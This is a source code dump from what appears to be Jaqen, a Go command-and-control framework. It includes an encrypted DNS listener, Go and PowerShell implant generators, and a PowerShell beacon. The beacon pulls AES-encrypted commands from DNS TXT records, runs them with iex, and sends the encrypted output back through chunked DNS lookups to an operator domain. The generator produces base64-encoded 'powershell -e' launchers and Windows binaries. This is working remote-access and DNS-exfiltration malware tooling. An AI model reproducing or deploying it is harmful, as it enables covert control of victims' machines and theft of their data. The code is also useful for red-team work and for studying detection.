188 | 	dns.HandleFunc(domain+".", func(w dns.ResponseWriter, r *dns.Msg) { d.handleDNS(w, r, "127.0.0.1", uuidChan, domain) })
189 | 
190 | 	// start DNS server
191 | 	server := &dns.Server{Addr: "0.0.0.0" + ":53", Net: "udp"}
192 | 	go func() {
193 | 		err := server.ListenAndServe()
194 | 
195 | 		if err != nil {
196 | 			fmt.Println("Server error: ", err)
197 | 		}
198 | 		defer d.Stop()
199 | 	}()
200 | 	return server
201 | }
202 | 
203 | func (j *JaqenEncryptedDNSListener) handleDNS(w dns.ResponseWriter, r *dns.Msg, EXT_IP string, uuidChan chan string, domain string) {
204 | 	// many thanks to the original author of this function
205 | 	m := &dns.Msg{
206 | 		Compress: false,
207 | 	}
208 | 	m.SetReply(r)
209 | 	m.Authoritative = true
210 | 	m.RecursionAvailable = true
211 | 	j.parseDNS(m, w.RemoteAddr().String(), EXT_IP, uuidChan, domain)
212 | 	w.WriteMsg(m)
213 | }
214 | 
215 | func (j *JaqenEncryptedDNSListener) parseDNS(m *dns.Msg, ipaddr string, EXT_IP string, uuidChan chan string, domain string) {
216 | 	// for each DNS question to our nameserver
217 | 	// there can be multiple questions in the question section of a single request
218 | 	for _, q := range m.Question {
219 | 		//received a A request (probably a client returning a response, or checking in)
220 | 		if q.Qtype == dns.TypeA {
221 | 			//todo:all of these should be encapsulated in an encrypted blob
222 | 			//<payload>.<chunknumber>.<maxmessagechunks>.<cmdid>.<uid>.<c2.domain.here.please>
223 | 			//working backwards in this function intentionally.
224 | 			//Trying to decide if recursion shoudl be used to use the whole 200 char space of dns names for large payloads
225 | 			z := strings.Split(q.Name, ".")
226 | 			if len(z) < len(strings.Split(domain, ".")) { //todo: allow multiple domains
227 | 				continue
228 | 			}
229 | 			z = z[:len(z)-(len(strings.Split(domain, "."))+1)]
230 | 			if len(z) != 5 && len(z) != 1 {
231 | 				fmt.Println("oh boy")
232 | 				continue
233 | 			}
234 | 			//last value is the uid of the command
235 | 			uid := z[len(z)-1]
236 | 			if len(z) == 5 {
237 | 				//next is cmdid
238 | 				cmdID := z[len(z)-2]
239 | 				//next is the max chunks
240 | 				maxChunks := z[len(z)-3]
241 | 				//then the chunk being sent
242 | 				thisChunk := z[len(z)-4]
243 | 				//and finally our payload
244 | 				payloads := z[:len(z)-4]
245 | 				payload := strings.Join(payloads, "")
246 | 
247 | 				cm.UpdateCmd(cmdID, maxChunks, thisChunk, payload)
248 | 				//check if cmd done
249 | 				if cm.IsDone(cmdID) {
250 | 					j.ResponseChan <- server.Command{
251 | 						UID:      uid,
252 | 						Cmd:      cm.GetCommand(cmdID).Command,
253 | 						Response: []byte(cm.GetCommand(cmdID).Response.ReadResposne()),
254 | 					}
255 | 					cm.ClearCommand(cmdID)
256 | 					//j.dnsResponseChan <- cm.GetCommand(cmdID).Response
257 | 				}
258 | 			} else {
259 | 				j.dnsCheckinChan <- dnsresponse{UID: uid}
260 | 			}
261 | 			r := dns.A{}
262 | 			r.Hdr = dns.RR_Header{
263 | 				Name:   q.Name,
264 | 				Rrtype: dns.TypeA,
265 | 				Class:  dns.ClassINET,
266 | 				Ttl:    10,
267 | 			}
268 | 			r.A = net.ParseIP("127.0.0.1") //can probably use this to signal good/bad
269 | 			rr, _ := dns.NewRR(r.String())
270 | 			m.Answer = append(m.Answer, rr)
271 | 		}
272 | 		//received a TXT request (probably a client looking for commands)
273 | 		if q.Qtype == dns.TypeTXT {
274 | 			//check if we have a pending command to send
275 | 			z := strings.Split(q.Name, ".")
276 | 			//cmdid.uid.c2.domain.here.please
277 | 			if len(z) < len(strings.Split(domain, ".")) {
278 | 				continue
279 | 			}
280 | 			z = z[:len(z)-(len(strings.Split(domain, "."))+1)]
281 | 			//uuid := z[len(z)-1]
282 | 
283 | 			if len(z) < 2 {
284 | 				continue
285 | 			}
286 | 
287 | 			uid := z[len(z)-1]
288 | 			//next is the cmdid
289 | 			cmdid := z[len(z)-2]
290 | 
291 | 			//set agent cmdID
292 | 			r := dns.TXT{}
293 | 			r.Hdr = dns.RR_Header{
294 | 				Name:   q.Name,
295 | 				Rrtype: dns.TypeTXT,
296 | 				Class:  dns.ClassINET,
297 | 				Ttl:    10,
298 | 			}
299 | 			//get key used for cmd
300 | 			ek, _ := j.GetOption("key")
301 | 			//decode key
302 | 			dk, _ := base64.StdEncoding.DecodeString(ek)
303 | 
304 | 			//get command to send the agent
305 | 			j.pcMut.Lock()
306 | 			newArr, cmd := popArray(j.pendingCommands[uid], dk)
307 | 			j.pendingCommands[uid] = newArr
308 | 			j.pcMut.Unlock()
309 | 
310 | 			decCmd, _ := util.DecryptHexStringToString(cmd, dk)
311 | 
312 | 			r.Txt = []string{cmd}
313 | 
314 | 			rr, _ := dns.NewRR(r.String())
315 | 			m.Answer = append(m.Answer, rr)
316 | 
317 | 			if decCmd != "NoCMD" {
318 | 
319 | 				//add to command manager
320 | 				c := dnsCommand{
321 | 					Command:  decCmd,
322 | 					UID:      cmdid,
323 | 					Response: dnsresponse{Key: dk},
324 | 				}
325 | 				cm.AddCommand(c)
326 | 				uuidChan <- uid
327 | 			} else {
328 | 				//cm.SetCommandToSend("NoCMD")
329 | 			}
330 | 		}
331 | 	}
332 | }
333 | 
334 | func (t JaqenEncryptedDNSListener) GetInfo() server.ListenerInfo {
335 | 
336 | 	//copy the options map to avoid bad stuff
337 | 	t.optionsMut.Lock()
338 | 	newMap := make(map[string]string)
339 | 	for k, v := range t.options {
340 | 		newMap[k] = v
341 | 	}
342 | 	t.optionsMut.Unlock()
343 | 
344 | 	return server.ListenerInfo{
345 | 		Name:    t.GetName(),
346 | 		Running: t.running,
347 | 		Options: newMap,
348 | 	}
349 | }
350 | 
351 | func (t JaqenEncryptedDNSListener) GenerateAgentFormats() []string {
352 | 	return []string{
353 | 		"powershell",
354 | 		"golang",
355 | 		//"bash",
356 | 	}
357 | }
358 | 
359 | func (t JaqenEncryptedDNSListener) Generate(s string) []byte {
360 | 	switch strings.ToLower(s) {
361 | 	case "powershell":
362 | 		return []byte(t.genPowershellAgent())
363 | 	case "golang":
364 | 		return t.genGolangAgent()
365 | 		//case "bash":
366 | 		//return []byte(t.genBashAgent())
367 | 	}
368 | 	return []byte{}
369 | }
370 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/encryptedDNSListener/encryptedDNSAgent.go:
--------------------------------------------------------------------------------
  1 | package encryptedDNSListener
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"encoding/base64"
  6 | 	"fmt"
  7 | 	"io/ioutil"
  8 | 	"os"
  9 | 	"path"
 10 | 	"strconv"
 11 | 	"text/template"
 12 | 
 13 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 14 | 	"github.com/gobuffalo/packr"
 15 | 	"golang.org/x/text/encoding/unicode"
 16 | )
 17 | 
 18 | func (d JaqenEncryptedDNSListener) genGolangAgent() []byte {
 19 | 	//Thanks to moloch-- and the rosie project for figuring out how to do the generation stuff mostly good https://github.com/moloch--/rosie
 20 | 	dom, _ := d.GetOption("domain")
 21 | 	b64key, _ := d.GetOption("key")
 22 | 	checkinTime, _ := d.GetOption("checkintime")
 23 | 	execTime, _ := d.GetOption("exectime")
 24 | 
 25 | 	codeStruct := server.AgentCode{
 26 | 		CmdExecTimeout: execTime,
 27 | 		CheckinMaxTime: checkinTime,
 28 | 		Imports: `*/
 29 | 		_ "crypto/sha256"	
 30 | 		"crypto/aes"
 31 | 		"crypto/cipher"
 32 | 		"crypto"
 33 | 		"crypto/hmac"
 34 | 		csrand "crypto/rand"
 35 | 		"encoding/base64"
 36 | 		"encoding/hex"
 37 | 		"errors"
 38 | 		"bytes"
 39 | 		"fmt"
 40 | 		"net"
 41 | 		"os"
 42 | 		/*`,
 43 | 		GlobalVars: `
 44 | 		*/const payloadSizeMax = 62
 45 | 
 46 | 		func encrypt(plaintext, key []byte) ([]byte, error) {
 47 | 			block, e := aes.NewCipher(key)
 48 | 			if e != nil {
 49 | 				return []byte{}, e
 50 | 			}
 51 | 			iv, e := generateRandomBytes(aes.BlockSize)
 52 | 		
 53 | 			mode := cipher.NewCBCEncrypter(block, iv) //, iv []byte) NewGCM(block) //, iv)
 54 | 		
 55 | 			pt, e := pkcs7Pad([]byte(plaintext), aes.BlockSize)
 56 | 			ct := make([]byte, len(pt))
 57 | 		
 58 | 			mode.CryptBlocks(ct, pt)
 59 | 		
 60 | 			ct = append(iv, ct...)
 61 | 		
 62 | 			//authenticate
 63 | 			mac := hmac.New(crypto.SHA256.New, key)
 64 | 			mac.Write(ct)
 65 | 			mmac := mac.Sum(nil)
 66 | 		
 67 | 			ct = append(mmac, ct...)
 68 | 			return ct, nil
 69 | 		}
 70 | 		var (
 71 | 			// ErrInvalidBlockSize indicates hash blocksize <= 0.
 72 | 			ErrInvalidBlockSize = errors.New("invalid blocksize")
 73 | 		
 74 | 			// ErrInvalidPKCS7Data indicates bad input to PKCS7 pad or unpad.
 75 | 			ErrInvalidPKCS7Data = errors.New("invalid PKCS7 data (empty or not padded)")
 76 | 		
 77 | 			// ErrInvalidPKCS7Padding indicates PKCS7 unpad fails to bad input.
 78 | 			ErrInvalidPKCS7Padding = errors.New("invalid padding on input")
 79 | 		)
 80 | 		func pkcs7Pad(b []byte, blocksize int) ([]byte, error) {
 81 | 			if blocksize <= 0 {
 82 | 				return nil, nil
 83 | 			}
 84 | 			if b == nil || len(b) == 0 {
 85 | 				return nil, ErrInvalidPKCS7Data
 86 | 			}
 87 | 			n := blocksize - (len(b) % blocksize)
 88 | 			pb := make([]byte, len(b)+n)
 89 | 			copy(pb, b)
 90 | 			copy(pb[len(b):], bytes.Repeat([]byte{byte(n)}, n))
 91 | 			return pb, nil
 92 | 		}
 93 | 		
 94 | 		func pkcs7Unpad(b []byte, blocksize int) ([]byte, error) {
 95 | 			if blocksize <= 0 {
 96 | 				return nil, ErrInvalidBlockSize
 97 | 			}
 98 | 			if b == nil || len(b) == 0 {
 99 | 				return nil, ErrInvalidPKCS7Data
100 | 			}
101 | 			if len(b)%blocksize != 0 {
102 | 				return nil, ErrInvalidPKCS7Padding
103 | 			}
104 | 			c := b[len(b)-1]
105 | 			n := int(c)
106 | 			if n == 0 || n > len(b) {
107 | 				return nil, ErrInvalidPKCS7Padding
108 | 			}
109 | 			for i := 0; i < n; i++ {
110 | 				if b[len(b)-n+i] != c {
111 | 					return nil, ErrInvalidPKCS7Padding
112 | 				}
113 | 			}
114 | 			return b[:len(b)-n], nil
115 | 		}
116 | 
117 | 		func generateRandomBytes(n int) ([]byte, error) {
118 | 			b := make([]byte, n)
119 | 			_, err := csrand.Read(b)
120 | 			// Note that err == nil only if we read len(b) bytes.
121 | 			if err != nil {
122 | 				return nil, err
123 | 			}
124 | 		
125 | 			return b, nil
126 | 		}
127 | 		
128 | 		func decrypt(ct, key []byte) ([]byte, error) {
129 | 			ctmac := ct[:crypto.SHA256.Size()]
130 | 
131 | 			mac := hmac.New(crypto.SHA256.New, key)
132 | 			mac.Write(ct[crypto.SHA256.Size():])
133 | 			ourmac := mac.Sum(nil)
134 | 		
135 | 			if !hmac.Equal(ctmac, ourmac) {
136 | 				return []byte{}, errors.New("HMAC Fail")
137 | 			}
138 | 		
139 | 			ct = ct[crypto.SHA256.Size():]
140 | 		
141 | 			block, e := aes.NewCipher(key)
142 | 			if e != nil {
143 | 				return []byte{}, e
144 | 			}
145 | 		
146 | 			mode := cipher.NewCBCDecrypter(block, ct[:aes.BlockSize]) //NewGCM(block) //, iv)
147 | 			if e != nil {
148 | 				return []byte{}, e
149 | 			}
150 | 		
151 | 			ct = ct[aes.BlockSize:]
152 | 			pt := make([]byte, len(ct))
153 | 		
154 | 			mode.CryptBlocks(pt, ct)
155 | 		
156 | 			//unpad
157 | 			pt, e = pkcs7Unpad(pt, aes.BlockSize)
158 | 		
159 | 			return pt, e
160 | 		}
161 | 		
162 | 		func decryptToString(ct, key []byte) (string, error) {
163 | 			pt, e := decrypt(ct, key)
164 | 			if e != nil {
165 | 				return "", e
166 | 			}
167 | 			return string(pt), nil
168 | 		}
169 | 		
170 | 		func decryptHexStringToString(ct string, ekey string) (string, error) {
171 | 			decodedCt, e := hex.DecodeString(ct)
172 | 			if e != nil {
173 | 				return "", e
174 | 			}
175 | 		
176 | 			key, e := base64.StdEncoding.DecodeString(ekey)
177 | 			if e != nil {
178 | 				return "", e
179 | 			}
180 | 		
181 | 			return decryptToString(decodedCt, key)
182 | 		}
183 | /*
184 | `,
185 | 		Checkin: `*/	
186 | 		net.LookupIP(a.uid + "." + a.settings.Get("c2Domain"))
187 | 		/*`,
188 | 		Init: `*/	
189 | 		a.settings.Set("c2Domain", "` + dom + `")
190 | 		a.settings.Set("key", "` + b64key + `")
191 | 		/*`,
192 | 		GetCommand: `*/
193 | 		cmdID := RandStringRunes(4)
194 | 		lookupAddr := fmt.Sprintf("%s.%s.%s", cmdID, a.uid, a.settings.Get("c2Domain"))
195 | 		command, err := net.LookupTXT(lookupAddr)
196 | 		if err != nil {
197 | 			os.Exit(0)
198 | 		}
199 | 	
200 | 		scmd := strings.Join(command, "")
201 | 		//decode and decrypt
202 | 	
203 | 		scmd, _ = decryptHexStringToString(scmd, a.settings.Get("key"))
204 | 	
205 | 		a.cmd, a.cmdID = scmd, cmdID
206 | 	
207 | 		if a.cmd != "NoCMD" {
208 | 			return true
209 | 		}
210 | 		if a.cmd == "exit" {
211 | 			os.Exit(0)
212 | 		}
213 | 		/*`,
214 | 		ExecCommand: `*//*`,
215 | 		SendResponse: `*/	
216 | 		k := a.GetSetting("key")
217 | 		dk, _ := base64.StdEncoding.DecodeString(k)
218 | 	
219 | 		b, _ = encrypt(b, dk) //, iv)
220 | 	
221 | 		encodedResult := hex.EncodeToString(b)
222 | 		blocks := len(encodedResult) / payloadSizeMax
223 | 		leftover := len(encodedResult) % payloadSizeMax
224 | 		if leftover > 0 {
225 | 			blocks++
226 | 		}
227 | 	
228 | 		for x := 1; x <= blocks; x++ {
229 | 			minVal := (x - 1) * payloadSizeMax
230 | 			maxVal := x * payloadSizeMax
231 | 			if maxVal > len(encodedResult) {
232 | 				maxVal = len(encodedResult)
233 | 			}
234 | 			payload := encodedResult[minVal:maxVal]
235 | 			chunknumber := x
236 | 			maxChunks := blocks
237 | 			lookupaddr := fmt.Sprintf("%s.%d.%d.%s.%s.%s", payload, chunknumber, maxChunks, a.cmdID, a.uid, a.GetSetting("c2Domain"))
238 | 	
239 | 			go func() {
240 | 				for {
241 | 					x, err := net.LookupIP(lookupaddr)
242 | 					if err != nil {
243 | 						continue
244 | 					}
245 | 					z := net.ParseIP("127.0.0.1")
246 | 					if z.Equal(x[0]) {
247 | 						break
248 | 					}
249 | 					time.Sleep(time.Duration(3)*time.Second) //arbitrary sleep retry value (1 was too low, got repeated responses)
250 | 				}
251 | 			}()
252 | 	
253 | 		}
254 | 		/*`,
255 | 	}
256 | 
257 | 	codeStruct.AVoid("")
258 | 
259 | 	boxs, err := packr.NewBox("../../../").MustString("agent/agent.go")
260 | 	if err != nil {
261 | 		fmt.Println(err)
262 | 		return []byte("")
263 | 	}
264 | 
265 | 	code, err := template.New("goagent").Parse(boxs)
266 | 	if err != nil {
267 | 		fmt.Println(err)
268 | 		return []byte("")
269 | 	}
270 | 
271 | 	var buf bytes.Buffer
272 | 
273 | 	err = code.Execute(&buf, codeStruct)
274 | 
275 | 	if err != nil {
276 | 		fmt.Println(err)
277 | 	}
278 | 
279 | 	binDir, err := ioutil.TempDir("", "jaqen-build")
280 | 
281 | 	if err != nil {
282 | 		fmt.Println(err)
283 | 	}
284 | 
285 | 	workingDir := path.Join(binDir, "agent.go")
286 | 
287 | 	fmt.Println("working", workingDir)
288 | 	codeFile, err := os.Create(workingDir)
289 | 	if err != nil {
290 | 		fmt.Println(err)
291 | 	}
292 | 
293 | 	fmt.Println("Generating code to: " + codeFile.Name())
294 | 
295 | 	err = code.Execute(codeFile, codeStruct)
296 | 
297 | 	if err != nil {
298 | 		fmt.Println(err)
299 | 	}
300 | 
301 | 	cgo, err := d.GetOption("cgo")
302 | 	if err != nil {
303 | 		cgo = "0"
304 | 	}
305 | 	goos, err := d.GetOption("goos")
306 | 	if err != nil {
307 | 		goos = "windows"
308 | 	}
309 | 	goarch, err := d.GetOption("goarch")
310 | 	if err != nil {
311 | 		goos = "x64"
312 | 	}
313 | 
314 | 	outfile, _ := d.GetOption("outfile")
315 | 
316 | 	buildr := []string{"build"}
317 | 	if outfile != "" {
318 | 		buildr = append(buildr, "-o")
319 | 		buildr = append(buildr, outfile)
320 | 	}
321 | 
322 | 	goroot := server.GetGoRoot()
323 | 	gopath := server.GetGoPath()
324 | 
325 | 	err = server.GoCmd(server.GoConfig{
326 | 		CGO:    cgo,
327 | 		GOOS:   goos,
328 | 		GOARCH: goarch,
329 | 		GOROOT: goroot,
330 | 		GOPATH: gopath,
331 | 	},
332 | 		binDir,
333 | 		buildr,
334 | 	)
335 | 
336 | 	if err != nil {
337 | 		fmt.Println(err)
338 | 		return []byte{}
339 | 	}
340 | 
341 | 	return []byte{} //buf.Bytes()
342 | }
343 | 
344 | type powershellagent struct {
345 | 	Domain string
346 | 	Split  int
347 | 	Key    string
348 | }
349 | 
350 | func (d JaqenEncryptedDNSListener) genBashAgent() string {
351 | 	dom, _ := d.GetOption("domain")
352 | 
353 | 	spl := 60
354 | 
355 | 	st, e := d.GetOption("split")
356 | 	if e == nil {
357 | 		spl, e = strconv.Atoi(st)
358 | 		if e != nil {
359 | 			fmt.Println(e)
360 | 		}
361 | 	}
362 | 
363 | 	cfg := powershellagent{
364 | 		Domain: dom,
365 | 		Split:  spl,
366 | 	}
367 | 	boxs, err := packr.NewBox("./").MustString("bashdnsagent.sh")
368 | 
369 | 	if err != nil {
370 | 		fmt.Println(err)
371 | 		return ""
372 | 	}
373 | 	code, err := template.New("bashdnsagent").Parse(boxs)
374 | 	if err != nil {
375 | 		fmt.Println(err)
376 | 		return ""
377 | 	}
378 | 	var buf bytes.Buffer
379 | 
380 | 	err = code.Execute(&buf, cfg)
381 | 	if err != nil {
382 | 		fmt.Println(err)
383 | 	}
384 | 	return buf.String()
385 | }
386 | 
387 | func (d JaqenEncryptedDNSListener) genPowershellAgent() string {
388 | 	dom, _ := d.GetOption("domain")
389 | 	key, _ := d.GetOption("key")
390 | 	spl := 60
391 | 
392 | 	st, e := d.GetOption("split")
393 | 	if e == nil {
394 | 		spl, e = strconv.Atoi(st)
395 | 		if e != nil {
396 | 			fmt.Println(e)
397 | 		}
398 | 	}
399 | 
400 | 	cfg := powershellagent{
401 | 		Domain: dom,
402 | 		Split:  spl,
403 | 		Key:    key,
404 | 	}
405 | 	boxs, err := packr.NewBox("./").MustString("encryptedDNSAgent.ps1")
406 | 
407 | 	if err != nil {
408 | 		fmt.Println(err)
409 | 		return ""
410 | 	}
411 | 	code, err := template.New("dnsagent").Parse(boxs)
412 | 	if err != nil {
413 | 		fmt.Println(err)
414 | 		return ""
415 | 	}
416 | 	var buf bytes.Buffer
417 | 
418 | 	err = code.Execute(&buf, cfg)
419 | 	if err != nil {
420 | 		fmt.Println(err)
421 | 	}
422 | 	x, _ := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder().String(buf.String())
423 | 	return "powershell -e " + base64.StdEncoding.EncodeToString([]byte(x))
424 | 	//return x //buf.String()
425 | }
426 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/encryptedDNSListener/encryptedDNSAgent.ps1:
--------------------------------------------------------------------------------
  1 | $url="{{.Domain}}";
  2 | $uidr=Get-Random;
  3 | $uid=$uidr.toString();
  4 | function Create-AesManaged($iv) {
  5 |     $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
  6 |     $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
  7 |     $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
  8 |     $aesManaged.BlockSize = 128
  9 |     $aesManaged.KeySize = 256
 10 |     if ($iv) {
 11 |         $aesManaged.IV = $iv
 12 |     }else{
 13 |     $aesManaged.GenerateIV()
 14 |     }
 15 |     $aesManaged.Key = [system.Convert]::FromBase64String("{{.Key}}")
 16 |     $aesManaged
 17 | }
 18 | function Encrypt($unencryptedString) {
 19 |     $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
 20 |     $aesManaged = Create-AesManaged
 21 |     $encryptor = $aesManaged.CreateEncryptor()
 22 |     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
 23 |     $fullData = $aesManaged.IV + $encryptedData  
 24 |     $hmacsha = New-Object System.Security.Cryptography.HMACSHA256
 25 |     $hmacsha.key = $aesManaged.Key
 26 |     $aesManaged.Dispose()
 27 |     $signature = $hmacsha.ComputeHash($fullData)
 28 |     $fullData = $signature + $fullData
 29 |     return $fullData
 30 | }
 31 | function decrypt($ct){
 32 |     $Bytes = [byte[]]::new($ct.Length / 2)
 33 |         For($i=0; $i -lt $ct.Length; $i+=2){
 34 |         $Bytes[$i/2] = [convert]::ToByte($ct.Substring($i, 2), 16)
 35 |     }
 36 |     $sig = $Bytes[0..31]
 37 |     $Bytes = $bytes[32..($bytes.Length-1)]
 38 |     $iv = $Bytes[0..15]
 39 |     $bytes = $Bytes[16..($bytes.Length-1)]
 40 |     $hmacsha = New-Object System.Security.Cryptography.HMACSHA256
 41 |     $aesManaged = Create-AesManaged $iv
 42 |     $hmacsha.key = $aesManaged.Key
 43 |     $aesManaged.Dispose()
 44 |     $signature = $hmacsha.ComputeHash($iv+$bytes)
 45 |     $areEqual = @(Compare-Object $signature $sig -SyncWindow 0).Length -eq 0
 46 |     if (!$areEqual){
 47 |         return
 48 |     }
 49 |     $aesManaged = Create-AesManaged $iv
 50 |     $decryptor = $aesManaged.CreateDecryptor()
 51 |     $unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
 52 |     $aesManaged.Dispose()
 53 |     $z = [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
 54 |     $z 
 55 | }
 56 | function execDNS{
 57 |     Param(
 58 |         [parameter(position=0)]$cmd,
 59 |         [parameter(position=1)]$cmdid
 60 |     )
 61 |     $cmd=[system.String]$cmd;
 62 |     $c=(iex $cmd)2>&1|Out-String;
 63 |     $c = encrypt $c
 64 |     $string=($c|Format-Hex|Select-Object -Expand Bytes|ForEach-Object{'{0:x2}' -f $_}) -join '';
 65 |     $len=$string.Length;
 66 |     $split={{.Split}};
 67 |     $repeat=[Math]::Floor($len/$split);
 68 |     $remainder=$len%$split;
 69 |     $repeatr=$repeat;
 70 |     if($remainder){
 71 |         $repeatr=$repeat+1;
 72 |     };
 73 |     for($i=0;$i -lt $repeat;$i++){
 74 |         $str=$string.Substring($i*$Split,$Split);
 75 |         $durl=$str+"."+($i+1)+"."+$repeatr+"."+$cmdid+"."+$uid+"."+$url;
 76 |         $q=resolve-dnsname -Name $durl -type 1;
 77 |     };
 78 |     if($remainder){
 79 |         $str=$string.Substring($len-$remainder);
 80 |         $durl2=$str+"."+($i+1)+"."+$repeatr+"."+$cmdid+"."+$uid+"."+$url;
 81 |         $q=resolve-dnsname -type 1 $durl2;
 82 |     };
 83 | };
 84 | function getCmd{
 85 |     Param(
 86 |         [parameter(position=0)]$domain,
 87 |         [parameter(position=0)]$cmdid
 88 |     )
 89 | }
 90 | while(1){
 91 |     $checkin=$uid+"."+$url;
 92 |     $q=resolve-dnsname -type 1 -Name $checkin;
 93 |     $c=Get-Random;
 94 |     $cs=$c.ToString();
 95 |     Start-Sleep -s 5;
 96 |     $u=$cs+"."+$uid+"."+$url;
 97 |     $txt=resolve-dnsname -type 16 -dnsonly $u|select-object Strings|%{$_.Strings}|Out-String;
 98 |     $txt=$txt-replace"`n|`r";
 99 |     $txt = decrypt $txt;
100 |     if($txt -match'NoCMD'){continue}elseif($txt -match'exit'){Exit}else{execDNS -cmd $txt -cmdid $cs};
101 | };
102 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/encryptedDNSListener/encryptedDNSCommandManager.go:
--------------------------------------------------------------------------------
  1 | package encryptedDNSListener
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"sort"
  6 | 	"strconv"
  7 | 	"sync"
  8 | 
  9 | 	"github.com/c-sto/Jaqen/libJaqen/server/util"
 10 | )
 11 | 
 12 | /*
 13 | type dnsresponse struct {
 14 | 	Chunks      []dnschunk
 15 | 	TotalChunks int64
 16 | 	ReadChunks  int64
 17 | }*/
 18 | 
 19 | type dnsresponse struct {
 20 | 	UID         string
 21 | 	MaxChunks   string
 22 | 	ThisChunk   string
 23 | 	Payload     string
 24 | 	CmdID       string
 25 | 	Response    []byte
 26 | 	Chunks      []dnschunk
 27 | 	TotalChunks int64
 28 | 	ReadChunks  int64
 29 | 	Key         []byte
 30 | }
 31 | 
 32 | type dnschunk struct {
 33 | 	Body string
 34 | 	Num  int64
 35 | }
 36 | 
 37 | type dnsCommand struct {
 38 | 	Command  string
 39 | 	UID      string
 40 | 	CmdID    string
 41 | 	Response dnsresponse
 42 | }
 43 | 
 44 | type dnsCommandManager struct {
 45 | 	commandMap     map[string]dnsCommand
 46 | 	cMMutex        *sync.RWMutex
 47 | 	waitingCommand string
 48 | }
 49 | 
 50 | func (cm *dnsCommandManager) Init() {
 51 | 	cm.commandMap = make(map[string]dnsCommand)
 52 | 	cm.cMMutex = &sync.RWMutex{}
 53 | 
 54 | }
 55 | 
 56 | func (cm dnsCommandManager) GetCommandToSend() string {
 57 | 	cm.cMMutex.RLock()
 58 | 	defer cm.cMMutex.RUnlock()
 59 | 	return cm.waitingCommand
 60 | }
 61 | 
 62 | func (cm *dnsCommandManager) GetCommand(c string) dnsCommand {
 63 | 	cm.cMMutex.RLock()
 64 | 	defer cm.cMMutex.RUnlock()
 65 | 	if v, ok := cm.commandMap[c]; ok {
 66 | 		return v
 67 | 	}
 68 | 	return dnsCommand{}
 69 | }
 70 | 
 71 | func (cm *dnsCommandManager) ClearCommand(c string) {
 72 | 	cm.cMMutex.Lock()
 73 | 	defer cm.cMMutex.Unlock()
 74 | 	delete(cm.commandMap, c)
 75 | }
 76 | 
 77 | func (cm *dnsCommandManager) SetCommandToSend(s string) {
 78 | 	cm.cMMutex.Lock()
 79 | 	defer cm.cMMutex.Unlock()
 80 | 	cm.waitingCommand = s
 81 | }
 82 | 
 83 | //uuid == cmdid
 84 | func (cm *dnsCommandManager) UpdateCmd(uuid, maxchunks, thischunk, vals string) {
 85 | 	cm.cMMutex.Lock()
 86 | 	defer cm.cMMutex.Unlock()
 87 | 	c, ok := cm.commandMap[uuid]
 88 | 
 89 | 	if !ok {
 90 | 		return
 91 | 	}
 92 | 
 93 | 	cn, e := strconv.ParseInt(thischunk, 10, 64)
 94 | 	if e != nil {
 95 | 		fmt.Println("Bad chunk number: ", e)
 96 | 		return
 97 | 	}
 98 | 	mc, e := strconv.ParseInt(maxchunks, 10, 64)
 99 | 	if e != nil {
100 | 		fmt.Println("Bad max chunk number: ", e)
101 | 		return
102 | 	}
103 | 	c.Response.TotalChunks = mc
104 | 	c.Response.AddChunk(cn, vals)
105 | 	cm.commandMap[uuid] = c
106 | 
107 | 	fmt.Println(fmt.Sprintf("Recv %d of %d", c.Response.ReadChunks, c.Response.TotalChunks))
108 | 
109 | }
110 | 
111 | func (cm *dnsCommandManager) AddCommand(c dnsCommand) {
112 | 	cm.cMMutex.Lock()
113 | 	defer cm.cMMutex.Unlock()
114 | 	cm.commandMap[c.UID] = c
115 | }
116 | 
117 | func (r *dnsresponse) AddChunk(cnum int64, val string) {
118 | 	//check for existing chunk
119 | 	for _, x := range r.Chunks {
120 | 		if x.Num == cnum {
121 | 			return
122 | 		}
123 | 	}
124 | 	r.Chunks = append(r.Chunks, dnschunk{Body: val, Num: cnum})
125 | 	r.ReadChunks++
126 | }
127 | 
128 | func (cm *dnsCommandManager) IsDone(cmdId string) bool {
129 | 	c := cm.GetCommand(cmdId).Response
130 | 	return c.IsDone()
131 | }
132 | 
133 | func (r dnsresponse) IsDone() bool {
134 | 	if r.TotalChunks == 0 || r.TotalChunks > r.ReadChunks {
135 | 		return false
136 | 	}
137 | 	return true
138 | }
139 | 
140 | func (r dnsresponse) ReadResposne() string {
141 | 	//sort chunks
142 | 	rval := ""
143 | 	sort.Slice(r.Chunks, func(i, j int) bool {
144 | 		if r.Chunks[i].Num < r.Chunks[j].Num {
145 | 			return true
146 | 		}
147 | 		return false
148 | 	})
149 | 	for _, x := range r.Chunks {
150 | 		rval += x.Body
151 | 	}
152 | 
153 | 	v, e := util.DecryptHexStringToString(rval, r.Key) //hex.DecodeString(rval)
154 | 
155 | 	//util.Decrypt
156 | 	if e != nil {
157 | 		fmt.Println("ReadResponse Error:", e)
158 | 	}
159 | 	return string(v)
160 | }
161 | 


--------------------------------------------------------------------------------
/libJaqen/server/listeners/tcpListener/agent.go:
--------------------------------------------------------------------------------
 1 | package tcpListener
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"fmt"
 6 | 	"io"
 7 | 	"net"
 8 | 
 9 | 	uuid "github.com/satori/go.uuid"
10 | )
11 | 
12 | type agent struct {
13 | 	inChan     chan string      //data to send
14 | 	outChan    chan tcpResponse //data received
15 | 	reader     *bufio.Reader
16 | 	writer     *bufio.Writer
17 | 	conn       net.Conn
18 | 	connection *agent
19 | 	id         string
20 | 	Running    bool
21 | }
22 | 
23 | func (a *agent) GetID() string {
24 | 
25 | 	if a.id == "" {
26 | 		//generate id
27 | 		x, err := uuid.NewV4()
28 | 		if err != nil {
29 | 			fmt.Println(err)
30 | 		}
31 | 		a.id = x.String()
32 | 		//a.id = "cats"
33 | 	}
34 | 	return a.id
35 | }
36 | 
37 | func (a *agent) Read() {
